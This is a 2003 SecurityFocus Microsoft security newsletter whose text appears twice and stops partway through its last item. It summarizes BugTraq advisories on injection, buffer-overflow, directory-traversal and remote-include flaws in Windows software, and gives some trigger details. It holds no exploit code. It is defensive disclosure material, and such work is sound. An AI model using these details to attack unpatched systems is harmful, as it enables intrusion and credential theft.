SecurityFocus Microsoft Newsletter #146
---------------------------------------
This Issue is Sponsored by: KaVaDo
Your network Firewall and IDS products do not prevent Web application
exploits - the most common form of online attack - resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner, ·
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without compromising
business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/Kavado-ms-secnews3
------------------------------------------------------------------------
-------
I. FRONT AND CENTER
1. Waiting for the Worms
2. Blogs: Another Tool in the Security Pro's Toolkit (Part One)
3. Forensic Log Parsing with Microsoft's LogParser
4. Honeytokens: The Other Honeypot
5. The SecurityFocus 4th Anniversary Contest Winners Announced
6. **ANNOUNCEMENT**
II. MICROSOFT VULNERABILITY SUMMARY
1. Invision Power Board Multiple Vulnerabilities
2. Multiple Trend Micro HouseCall ActiveX Control Remote Buffer...
3. NeoModus Direct Connect Infinite Request Remote Denial Of...
4. Netscape Client Detection Tool Plug-In Buffer Overflow...
5. Microsoft Internet Explorer AutoScan Method Browser...
6. Mabry Software HTTPServer/X File Disclosure Vulnerability
7. PHPForum Mainfile.PHP Remote File Include Vulnerability
8. Twilight WebServer GET Request Buffer Overflow Vulnerability
9. TurboSoft TurboFTP Receive Buffer Overflow Vulnerability
10. ASP-DEV Discussion Forum Admin Directory Weak Default...
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
12. Microsoft Internet Explorer window.createPopup Interface...
13. ImageMagick Display Filename Format String Vulnerability
14. Exceed Font Name Handler Buffer Overflow Vulnerability
15. NetSuite HTTP Server Directory Traversal Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Internet explorer history viewer (Thread)
2. CA-SSL in IIS (Thread)
3. AW: Internet explorer history viewer (Thread)
4. CIFS Security (Thread)
5. SecurityFocus Microsoft Newsletter #145 (Thread)
6. FW: Keyboard Locking/Invisible Screensaver (Thread)
7. investigating misuse of the internet (Thread)
8. How to generate list of patches installed? (long) (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Primedius Personal Firewall/Anti-Spy ware
2. F-Secure Internet Security 2003
3. Steganos Security Suite 5
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. aNTG v1.0
2. LibTomMath v0.23
3. Darik's Boot and Nuke v1.0.1
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Waiting for the Worms
By Tim Mullen
The hole's been announced, the patch has been released. Now there's
nothing to do but wait for the worm to come and wreak its ugly havoc.
http://www.securityfocus.com/columnists/174
2. Blogs: Another Tool in the Security Pro's Toolkit (Part One)
By Scott Granneman
I'll admit, I love information. No, make that I love and need information.
If you're interested in keeping up with trends and changes in security,
you're probably an information addict as well. You absorb security-related
information and then ponder, examine, and analyze it before reshaping it
in a way that helps protect your data, your systems, and your networks.
http://www.securityfocus.com/columnists/173
2. Forensic Log Parsing with Microsoft's LogParser
By Mark Burnett
The purpose of this article is to demonstrate log file forensics for IIS
using SQL queries with Microsoft's LogParser tool.
http://www.securityfocus.com/infocus/1712
3. Honeytokens: The Other Honeypot
By Lance Spitzner
The purpose of this series of honeypot papers is to cover the breadth of
honeypot technologies, values and issues. This article extends the
capabilities even further by discussing the concept of honeytokens.
http://www.securityfocus.com/infocus/1713
4. The SecurityFocus 4th Anniversary Contest
With the contest having ended this past Wednsday July 16, 2003, and with a
large volume of entries, we have chosen the winners. The Two entrants who
came closest to choosing the correct day of Sept. 22, 2002 7:11 am MST
have won a pair of tickets to the Black Hat Briefings in Las Vegas, NV.
USA. Congratulations to Jenny H. of San Antonio, TX., and Leah E. of
Tucson AZ., for their winning entries.
5. **ANNOUNCEMENT**
ecurityFocus will now be masking email addresses contained within all our
Mailing Lists to ensure that they can no longer be harvested. We have
taken these steps with your privacy being our main concern.
II. BUGTRAQ SUMMARY
-------------------
1. Invision Power Board Multiple Vulnerabilities
BugTraq ID: 8165
Remote: Yes
Date Published: Jul 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8165
Summary:
Invision Board is web forum software. It is implemented in PHP and is
available for Unix and Linux variants and Microsoft Windows operating
systems.
It has been reported that Invision Power Board in some cases fails to
sufficiently sanitize user input in multiple instances, resulting in a
number of exploitable vulnerabilities. This creates a possibility for SQL
injection attacks, as well as HTML injection attacks.
HTML and script code are not filtered from within [FLASH][/FLASH] tags,
allowing for injection of hostile client-side script code into areas of
the bulletin board that allow these tags to be included. Exploitation
could result in theft of cookie-based authentication credentials from
other users. It will also be possible to control how the site is rendered
to other users. Other attacks are also possible.
The 'ipchat.php' does not filter SQL syntax supplied via URI parameters
before including it in database queries, allowing for SQL injection
attacks. This could be exploited to manipulate database queries,
potentially resulting in compromise of the bulletin board, information
disclosure or database corruption. SQL injection attacks may also allow
attackers to exploit latent vulnerabilities present in the underlying
database implementation.
This BID will be separated into multiple BIDs when analysis of these
issues is complete.
HouseCall is the online virus scanning service of Trend Micro. It is
available for the Microsoft Windows platform.
It has been reported that multiple buffer overflow vulnerabilities exist
in Trend Micro HouseCall. Because of this, an attacker may be able to
create a denial of service, or potentially gain elevated privileges on a
system with the vulnerable control installed.
Specific details about the overflows are not currently available. What is
known about them is that, when exploited, it is possible for an attacker
to execute arbitrary instructions through the browser of the vulnerable
user. Any code executed through this vulnerability would be with the
privileges of the browser user.
3. NeoModus Direct Connect Infinite Request Remote Denial Of Service Vulnerability
BugTraq ID: 8178
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8178
Summary:
Direct Connect is a freely available file sharing client distributed by
NeoModus. It is available for the Microsoft Windows and Linux platforms.
It has been reported that NeoModus Direct Connect does not sufficiently
limit requests. Because of this, an attacker could potentially deny
service to a legitimate user of the client.
The problem is in the limiting of connection requests by Direct Connect
hubs. It is possible for a user to send an infinite amount of connection
requests from one client to another through a hub. This could result in
the consuming of network and system resources by the target client, making
the target host unusable.
The Client Detection Tool plug-in is a component of the Netscape browser.
It is maintained and distributed by Netscape, and available for the
Microsoft Windows, Unix, and Linux platforms.
It has been reported that the Client Detection Tool plug-in is vulnerable
to a buffer overflow when handling some types of files. This may result
in the execution of arbitrary code with the privileges of the browser
user.
The problem is in the handling of specially crafted files of the x-cdt
mime type. A buffer overflow occurs when the CDT plug-in attempts to
handle an argument of greater than 256 bytes. When a file name and path
to a user's temporary directory total more than 256 bytes, it is possible
to execute code contained in the file name.
Some limitations exist in this vulnerability. For example, some operating
systems such as Microsoft Windows Server 2003 limit attachment name size
to 218 bytes. Additionally, the file name cannot contain non-ASCII
characters.
5. Microsoft Internet Explorer AutoScan Method Browser Security Policy Violation Weakness
BugTraq ID: 8169
Remote: Yes
Date Published: Jul 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8169
Summary:
A weakness has been reported in Microsoft Internet Explorer in the way the
AutoScan method is implemented. This weakness may result in the violation
of the browser security policy.
It is known that through the AutoScan method, it is possible to cause one
browser window to navigate to a different site through another. This
issue may not be limited to this specific method, and may aid in the
exploitation of other browser bugs to gain elevated privileges or
unauthorized access.
Mabry Software HTTPServer/X is a web server implemented as an ActiveX
Control and COM Object. It is available for Microsoft Windows operating
systems.
HTTPServer/X does not sufficiently sanitize directory traversal sequences
from web requests. This could allow remote users to request files outside
of the document root of the web server. Remote attackers could exploit
this issue to gain access to sensitive files on a system hosting the web
server implementation. Any files that are readable by the web server
would be exposed. The web server is reported to run with system level
privileges.
Successful exploitation may permit attackers to gain access to files
containing sensitive information, facilitating further attempts to
compromise the system.
phpForum is web forum software. It is available for Unix/Linux variants
and Microsoft Windows operating systems.
phpForum is prone to a vulnerability that may permit remote attackers to
include and execute malicious PHP scripts. Remote users, under some PHP
configurations, may influence $MAIN_PATH variable. This variable is used
in the include path for the 'config.php' script. By influencing the
include path so that it points to a malicious PHP script on a remote
system, it is possible to cause arbitrary PHP code to be executed. This
would occur in the context of the web server. This issue exists in the
'mainfile.php' script.
This could be exploited to execute malicious PHP commands in the context
of the web server process.
Twilight WebServer is an HTTP server designed for Microsoft Windows
platforms.
It has been reported that Twilight WebServer may be remotely exploitable,
due to a buffer overflow present in the function responsible for handling
HTTP GET requests. If an attacker sends a string exceeding a specific
length, it may be possible to crash the web server. If an attacker were to
corrupt sensitive data residing in adjacent memory locations, it may be
possible to execute arbitrary code.
TurboFTP is an FTP client that is designed for Microsoft Windows operating
systems.
TurboFTP has been reported prone to a buffer overrun vulnerability.
The issue likely presents itself due do a lack of sufficient bounds
checking performed on data that is later copied into a reserved internal
memory buffer. If an FTP server sends a response to the client exceeding
approximately 1 kilobyte, a buffer may be overrun and it may be possible
to corrupt adjacent memory. Because the data is converted into unicode
prior to being copied, conventional stack-based buffer overflow attacks
may not be successful. It is not known whether arbitrary code execution is
possible.
Discussion Forum is a freely available, open source message board
distributed by ASP-DEV. It is available for the Microsoft Windows
platform.
It has been reported that a vulnerability exists in ASP-DEV Discussion
Forum that exposes potentially sensitive information. Because of this, an
attacker may be able to gain access to user credentials.
The problem is in the permissions set on the admin directory. Sensitive
information is stored in this directory, including usernames, passwords,
and other data. This information also includes the administrative account
information, which may yield administrative privileges to the attacker.
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
BugTraq ID: 8175
Remote: No
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8175
Summary:
Grub is a freely available link indexing client for the Grub project. It
is available for the Microsoft Windows platform.
It has been reported that Grub does not sufficiently secure sensitive
information. Because of this, an attacker may be able to gain
unauthorized access to Grub user credentials.
The problem is in the storage of username and password information. This
information is stored in the system registry in the key
HKEY_CURRENT_USER\Software\VB and VBA Program
Settings\GrubClient\Settings. Data stored in this key is in plain text,
and can be retrieved by any user with read permissions of the registry
key.
12. Microsoft Internet Explorer window.createPopup Interface Spoofing Vulnerability
BugTraq ID: 8176
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8176
Summary:
Microsoft Internet Explorer may permit aspects of the Windows interface to
be spoofed. This could facilitate attacks a number of attacks against
users of the browser, including spoofing address bars for web pages, or
obscuring warning dialogs. Users may be apt to trust the spoofed content.
This issue is due to the window.createPopup() function not using
'chromeless' windows. Other functions, such as createModalDialog() and
createModelessDialog(), will create 'chromeless' windows when invoked.
Windows created via window.createPopup() will have a few characteristics
that may impede some types of attacks, such as the inability to focus the
window and also that the window will close when the user clicks outside of
it.
ImageMagick is an image manipulation program. It is available for a
variety of platforms including Microsoft Windows and Unix and Linux
variant operating systems.
The ImageMagick display program is alleged to be prone to a format string
vulnerability. Exploitation may occur when the program is invoked with a
filename that includes malicious format specifiers. This issue could be
exploited to corrupt arbitrary regions of memory with attacker-supplied
data, potentially resulting in execution of arbitrary code in the context
of the user running the program.
For this issue to be exploited, the program would need to be invoked with
an untrusted filename. This could occur automatically if the program was
specified as the default image viewer for an e-mail client or some other
program.
This issue was reported for Unix/Linux platforms. It is not known if
other platforms are similarly affected.
14. Exceed Font Name Handler Buffer Overflow Vulnerability
BugTraq ID: 8194
Remote: Yes
Date Published: Jul 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8194
Summary:
The Exceed X server is an X Windows server for Microsoft Windows systems.
The server listens for connections on port 6000. Exceed client software is
then used to connect to the Exceed X server.
The Exceed server and client have been reported prone to a remotely
triggered buffer overflow vulnerability. An attacker may trigger this
vulnerability by sending >=6001 bytes of data as a font name to the server
via an XLoadQueryFont() request, or by passing a malicious font name from
the server to the client in a manner sufficient to trigger the overflow.
When the vulnerable software handles this request it will crash.
The issue is likely due to a lack of sufficient bounds checking performed
on font name data before it is copied into a reserved memory buffer. If
the supplied data exceeds the size of the reserved buffer, excessive data
may overrun the bounds of the buffer and corrupt adjacent memory space. In
this instance, it has been reported that adjacent memory contains a saved
instruction pointer. Because the attacker has the ability to influence
program execution flow, it may be possible to supply and execute arbitrary
code. This however has not been confirmed.
It has been demonstrated that this vulnerability may be exploited to
trigger a denial of service condition, although unconfirmed, code
execution may also be possible.
NetSuite is a simple SMTP and HTTP/CGI server for Microsoft Windows based
systems.
The HTTP component of NetSuite has been reported prone to a directory
traversal vulnerability.
Various combinations of encoded directory traversal sequences may be used
to break out of the web root directory. Attackers may gain access to files
that are readable by the web server as a result.
Successful exploitation may expose sensitive information to remote
attackers. This information could be used to aid in further attacks that
attempt to compromise the host.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329280
2. CA-SSL in IIS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329281
3. AW: Internet explorer history viewer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329276
4. CIFS Security (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/329101
5. SecurityFocus Microsoft Newsletter #145 (Thread)
Relevant URL:
7. investigating misuse of the internet (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328725
8. How to generate list of patches installed? (long) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/328724
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Primedius Personal Firewall/Anti-Spy ware
by Primedius
Platforms: Windows 2000, Windows XP
Relevant URL:
http://www.primedius.com/PersonalFirewall.htm
Summary:
Primedius Personal Firewall/Anti-Spy ware Prevents intrusions, stops
unwanted entries to and communications from your computer. Other features
are: - Detects, reviews and screens any entry through Winsock layer.
2. F-Secure Internet Security 2003
by F-Secure Corporation
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.f-secure.com/estore/fsis2003.shtml
Summary:
F-Secure Internet Security 2003 includes an award winning antivirus
software, as well as an easy-to-use personal firewall product that
protects your system against break-in attempts when you are connected to
the Internet.
3. Steganos Security Suite 5
by Steganos
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.steganos.com/en/sss/index.htm
Summary:
A complete, easy-to-use security package that encrypts and conceals your
data. The Steganos Safe is a secure hard drive, which disappears at the
click of a button. Thanks to on-the-fly-encryption, 1 GB of data can be
encrypted in less than a second. Create encrypted e-mail attachments.
Includes Internet Trace Destructor, file shredder, e-mail encryption,
password manager and computer locking.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
-------------------------------------
1. aNTG v1.0
by Lucas
Relevant URL:
http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.
2. LibTomMath v0.23
by Tom St Denis tomstdenis (at) iahu (dot) ca [email concealed]
Relevant URL:
http://math.libtomcrypt.org/
Platforms: Linux, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows
XP
Summary:
LibTomMath provides highly optimized and portable routines for a vast
majority of integer-based number theoretic applications (including public
key cryptography).
3. Darik's Boot and Nuke v1.0.1
by Darik Horn
Relevant URL:
http://dban.sourceforge.net/
Platforms: Os Independent
Summary:
Darik's Boot and Nuke (DBAN) is a self-contained boot floppy that securely
wipes the hard disks of most computers. DBAN will automatically and
completely delete the contents of any hard disk that it can detect, which
makes it an appropriate utility for bulk or emergency data destruction.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
Your network Firewall and IDS products do not prevent Web application
exploits - the most common form of online attack - resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner, ·
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without compromising
business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/Kavado-ms-secnews3
------------------------------------------------------------------------
-------
---------------------------------------
This Issue is Sponsored by: KaVaDo
Your network Firewall and IDS products do not prevent Web application
exploits - the most common form of online attack - resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner, ·
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without compromising
business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/Kavado-ms-secnews3
------------------------------------------------------------------------
-------
I. FRONT AND CENTER
1. Waiting for the Worms
2. Blogs: Another Tool in the Security Pro's Toolkit (Part One)
3. Forensic Log Parsing with Microsoft's LogParser
4. Honeytokens: The Other Honeypot
5. The SecurityFocus 4th Anniversary Contest Winners Announced
6. **ANNOUNCEMENT**
II. MICROSOFT VULNERABILITY SUMMARY
1. Invision Power Board Multiple Vulnerabilities
2. Multiple Trend Micro HouseCall ActiveX Control Remote Buffer...
3. NeoModus Direct Connect Infinite Request Remote Denial Of...
4. Netscape Client Detection Tool Plug-In Buffer Overflow...
5. Microsoft Internet Explorer AutoScan Method Browser...
6. Mabry Software HTTPServer/X File Disclosure Vulnerability
7. PHPForum Mainfile.PHP Remote File Include Vulnerability
8. Twilight WebServer GET Request Buffer Overflow Vulnerability
9. TurboSoft TurboFTP Receive Buffer Overflow Vulnerability
10. ASP-DEV Discussion Forum Admin Directory Weak Default...
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
12. Microsoft Internet Explorer window.createPopup Interface...
13. ImageMagick Display Filename Format String Vulnerability
14. Exceed Font Name Handler Buffer Overflow Vulnerability
15. NetSuite HTTP Server Directory Traversal Vulnerability
III. MICROSOFT FOCUS LIST SUMMARY
1. Internet explorer history viewer (Thread)
2. CA-SSL in IIS (Thread)
3. AW: Internet explorer history viewer (Thread)
4. CIFS Security (Thread)
5. SecurityFocus Microsoft Newsletter #145 (Thread)
6. FW: Keyboard Locking/Invisible Screensaver (Thread)
7. investigating misuse of the internet (Thread)
8. How to generate list of patches installed? (long) (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Primedius Personal Firewall/Anti-Spy ware
2. F-Secure Internet Security 2003
3. Steganos Security Suite 5
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. aNTG v1.0
2. LibTomMath v0.23
3. Darik's Boot and Nuke v1.0.1
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Waiting for the Worms
By Tim Mullen
The hole's been announced, the patch has been released. Now there's
nothing to do but wait for the worm to come and wreak its ugly havoc.
http://www.securityfocus.com/columnists/174
2. Blogs: Another Tool in the Security Pro's Toolkit (Part One)
By Scott Granneman
I'll admit, I love information. No, make that I love and need information.
If you're interested in keeping up with trends and changes in security,
you're probably an information addict as well. You absorb security-related
information and then ponder, examine, and analyze it before reshaping it
in a way that helps protect your data, your systems, and your networks.
http://www.securityfocus.com/columnists/173
2. Forensic Log Parsing with Microsoft's LogParser
By Mark Burnett
The purpose of this article is to demonstrate log file forensics for IIS
using SQL queries with Microsoft's LogParser tool.
http://www.securityfocus.com/infocus/1712
3. Honeytokens: The Other Honeypot
By Lance Spitzner
The purpose of this series of honeypot papers is to cover the breadth of
honeypot technologies, values and issues. This article extends the
capabilities even further by discussing the concept of honeytokens.
http://www.securityfocus.com/infocus/1713
4. The SecurityFocus 4th Anniversary Contest
With the contest having ended this past Wednsday July 16, 2003, and with a
large volume of entries, we have chosen the winners. The Two entrants who
came closest to choosing the correct day of Sept. 22, 2002 7:11 am MST
have won a pair of tickets to the Black Hat Briefings in Las Vegas, NV.
USA. Congratulations to Jenny H. of San Antonio, TX., and Leah E. of
Tucson AZ., for their winning entries.
5. **ANNOUNCEMENT**
ecurityFocus will now be masking email addresses contained within all our
Mailing Lists to ensure that they can no longer be harvested. We have
taken these steps with your privacy being our main concern.
II. BUGTRAQ SUMMARY
-------------------
1. Invision Power Board Multiple Vulnerabilities
BugTraq ID: 8165
Remote: Yes
Date Published: Jul 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8165
Summary:
Invision Board is web forum software. It is implemented in PHP and is
available for Unix and Linux variants and Microsoft Windows operating
systems.
It has been reported that Invision Power Board in some cases fails to
sufficiently sanitize user input in multiple instances, resulting in a
number of exploitable vulnerabilities. This creates a possibility for SQL
injection attacks, as well as HTML injection attacks.
HTML and script code are not filtered from within [FLASH][/FLASH] tags,
allowing for injection of hostile client-side script code into areas of
the bulletin board that allow these tags to be included. Exploitation
could result in theft of cookie-based authentication credentials from
other users. It will also be possible to control how the site is rendered
to other users. Other attacks are also possible.
The 'ipchat.php' does not filter SQL syntax supplied via URI parameters
before including it in database queries, allowing for SQL injection
attacks. This could be exploited to manipulate database queries,
potentially resulting in compromise of the bulletin board, information
disclosure or database corruption. SQL injection attacks may also allow
attackers to exploit latent vulnerabilities present in the underlying
database implementation.
This BID will be separated into multiple BIDs when analysis of these
issues is complete.
2. Multiple Trend Micro HouseCall ActiveX Control Remote Buffer Overflow Vulnerabilities
BugTraq ID: 8170
Remote: Yes
Date Published: Jul 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8170
Summary:
HouseCall is the online virus scanning service of Trend Micro. It is
available for the Microsoft Windows platform.
It has been reported that multiple buffer overflow vulnerabilities exist
in Trend Micro HouseCall. Because of this, an attacker may be able to
create a denial of service, or potentially gain elevated privileges on a
system with the vulnerable control installed.
Specific details about the overflows are not currently available. What is
known about them is that, when exploited, it is possible for an attacker
to execute arbitrary instructions through the browser of the vulnerable
user. Any code executed through this vulnerability would be with the
privileges of the browser user.
3. NeoModus Direct Connect Infinite Request Remote Denial Of Service Vulnerability
BugTraq ID: 8178
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8178
Summary:
Direct Connect is a freely available file sharing client distributed by
NeoModus. It is available for the Microsoft Windows and Linux platforms.
It has been reported that NeoModus Direct Connect does not sufficiently
limit requests. Because of this, an attacker could potentially deny
service to a legitimate user of the client.
The problem is in the limiting of connection requests by Direct Connect
hubs. It is possible for a user to send an infinite amount of connection
requests from one client to another through a hub. This could result in
the consuming of network and system resources by the target client, making
the target host unusable.
4. Netscape Client Detection Tool Plug-In Buffer Overflow Vulnerability
BugTraq ID: 8180
Remote: No
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8180
Summary:
The Client Detection Tool plug-in is a component of the Netscape browser.
It is maintained and distributed by Netscape, and available for the
Microsoft Windows, Unix, and Linux platforms.
It has been reported that the Client Detection Tool plug-in is vulnerable
to a buffer overflow when handling some types of files. This may result
in the execution of arbitrary code with the privileges of the browser
user.
The problem is in the handling of specially crafted files of the x-cdt
mime type. A buffer overflow occurs when the CDT plug-in attempts to
handle an argument of greater than 256 bytes. When a file name and path
to a user's temporary directory total more than 256 bytes, it is possible
to execute code contained in the file name.
Some limitations exist in this vulnerability. For example, some operating
systems such as Microsoft Windows Server 2003 limit attachment name size
to 218 bytes. Additionally, the file name cannot contain non-ASCII
characters.
5. Microsoft Internet Explorer AutoScan Method Browser Security Policy Violation Weakness
BugTraq ID: 8169
Remote: Yes
Date Published: Jul 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8169
Summary:
A weakness has been reported in Microsoft Internet Explorer in the way the
AutoScan method is implemented. This weakness may result in the violation
of the browser security policy.
It is known that through the AutoScan method, it is possible to cause one
browser window to navigate to a different site through another. This
issue may not be limited to this specific method, and may aid in the
exploitation of other browser bugs to gain elevated privileges or
unauthorized access.
6. Mabry Software HTTPServer/X File Disclosure Vulnerability
BugTraq ID: 8166
Remote: Yes
Date Published: Jul 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8166
Summary:
Mabry Software HTTPServer/X is a web server implemented as an ActiveX
Control and COM Object. It is available for Microsoft Windows operating
systems.
HTTPServer/X does not sufficiently sanitize directory traversal sequences
from web requests. This could allow remote users to request files outside
of the document root of the web server. Remote attackers could exploit
this issue to gain access to sensitive files on a system hosting the web
server implementation. Any files that are readable by the web server
would be exposed. The web server is reported to run with system level
privileges.
Successful exploitation may permit attackers to gain access to files
containing sensitive information, facilitating further attempts to
compromise the system.
7. PHPForum Mainfile.PHP Remote File Include Vulnerability
BugTraq ID: 8158
Remote: Yes
Date Published: Jul 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8158
Summary:
phpForum is web forum software. It is available for Unix/Linux variants
and Microsoft Windows operating systems.
phpForum is prone to a vulnerability that may permit remote attackers to
include and execute malicious PHP scripts. Remote users, under some PHP
configurations, may influence $MAIN_PATH variable. This variable is used
in the include path for the 'config.php' script. By influencing the
include path so that it points to a malicious PHP script on a remote
system, it is possible to cause arbitrary PHP code to be executed. This
would occur in the context of the web server. This issue exists in the
'mainfile.php' script.
This could be exploited to execute malicious PHP commands in the context
of the web server process.
8. Twilight WebServer GET Request Buffer Overflow Vulnerability
BugTraq ID: 8181
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8181
Summary:
Twilight WebServer is an HTTP server designed for Microsoft Windows
platforms.
It has been reported that Twilight WebServer may be remotely exploitable,
due to a buffer overflow present in the function responsible for handling
HTTP GET requests. If an attacker sends a string exceeding a specific
length, it may be possible to crash the web server. If an attacker were to
corrupt sensitive data residing in adjacent memory locations, it may be
possible to execute arbitrary code.
9. TurboSoft TurboFTP Receive Buffer Overflow Vulnerability
BugTraq ID: 8163
Remote: Yes
Date Published: Jul 10 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8163
Summary:
TurboFTP is an FTP client that is designed for Microsoft Windows operating
systems.
TurboFTP has been reported prone to a buffer overrun vulnerability.
The issue likely presents itself due do a lack of sufficient bounds
checking performed on data that is later copied into a reserved internal
memory buffer. If an FTP server sends a response to the client exceeding
approximately 1 kilobyte, a buffer may be overrun and it may be possible
to corrupt adjacent memory. Because the data is converted into unicode
prior to being copied, conventional stack-based buffer overflow attacks
may not be successful. It is not known whether arbitrary code execution is
possible.
10. ASP-DEV Discussion Forum Admin Directory Weak Default Permissions Vulnerability
BugTraq ID: 8172
Remote: Yes
Date Published: Jul 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8172
Summary:
Discussion Forum is a freely available, open source message board
distributed by ASP-DEV. It is available for the Microsoft Windows
platform.
It has been reported that a vulnerability exists in ASP-DEV Discussion
Forum that exposes potentially sensitive information. Because of this, an
attacker may be able to gain access to user credentials.
The problem is in the permissions set on the admin directory. Sensitive
information is stored in this directory, including usernames, passwords,
and other data. This information also includes the administrative account
information, which may yield administrative privileges to the attacker.
11. LookSmart Grub Clear Text Password Local Storage Vulnerability
BugTraq ID: 8175
Remote: No
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8175
Summary:
Grub is a freely available link indexing client for the Grub project. It
is available for the Microsoft Windows platform.
It has been reported that Grub does not sufficiently secure sensitive
information. Because of this, an attacker may be able to gain
unauthorized access to Grub user credentials.
The problem is in the storage of username and password information. This
information is stored in the system registry in the key
HKEY_CURRENT_USER\Software\VB and VBA Program
Settings\GrubClient\Settings. Data stored in this key is in plain text,
and can be retrieved by any user with read permissions of the registry
key.
12. Microsoft Internet Explorer window.createPopup Interface Spoofing Vulnerability
BugTraq ID: 8176
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8176
Summary:
Microsoft Internet Explorer may permit aspects of the Windows interface to
be spoofed. This could facilitate attacks a number of attacks against
users of the browser, including spoofing address bars for web pages, or
obscuring warning dialogs. Users may be apt to trust the spoofed content.
This issue is due to the window.createPopup() function not using
'chromeless' windows. Other functions, such as createModalDialog() and
createModelessDialog(), will create 'chromeless' windows when invoked.
Windows created via window.createPopup() will have a few characteristics
that may impede some types of attacks, such as the inability to focus the
window and also that the window will close when the user clicks outside of
it.
13. ImageMagick Display Filename Format String Vulnerability
BugTraq ID: 8177
Remote: Yes
Date Published: Jul 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8177
Summary:
ImageMagick is an image manipulation program. It is available for a
variety of platforms including Microsoft Windows and Unix and Linux
variant operating systems.
The ImageMagick display program is alleged to be prone to a format string
vulnerability. Exploitation may occur when the program is invoked with a
filename that includes malicious format specifiers. This issue could be
exploited to corrupt arbitrary regions of memory with attacker-supplied
data, potentially resulting in execution of arbitrary code in the context
of the user running the program.
For this issue to be exploited, the program would need to be invoked with
an untrusted filename. This could occur automatically if the program was
specified as the default image viewer for an e-mail client or some other
program.
This issue was reported for Unix/Linux platforms. It is not known if
other platforms are similarly affected.
14. Exceed Font Name Handler Buffer Overflow Vulnerability
BugTraq ID: 8194
Remote: Yes
Date Published: Jul 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8194
Summary:
The Exceed X server is an X Windows server for Microsoft Windows systems.
The server listens for connections on port 6000. Exceed client software is
then used to connect to the Exceed X server.
The Exceed server and client have been reported prone to a remotely
triggered buffer overflow vulnerability. An attacker may trigger this
vulnerability by sending >=6001 bytes of data as a font name to the server
via an XLoadQueryFont() request, or by passing a malicious font name from
the server to the client in a manner sufficient to trigger the overflow.
When the vulnerable software handles this request it will crash.
The issue is likely due to a lack of sufficient bounds checking performed
on font name data before it is copied into a reserved memory buffer. If
the supplied data exceeds the size of the reserved buffer, excessive data
may overrun the bounds of the buffer and corrupt adjacent memory space. In
this instance, it has been reported that adjacent memory contains a saved
instruction pointer. Because the attacker has the ability to influence
program execution flow, it may be possible to supply and execute arbitrary
code. This however has not been confirmed.
It has been demonstrated that this vulnerability may be exploited to
trigger a denial of service condition, although unconfirmed, code
execution may also be possible.
15. NetSuite HTTP Server Directory Traversal Vulnerability
BugTraq ID: 8197
Remote: Yes
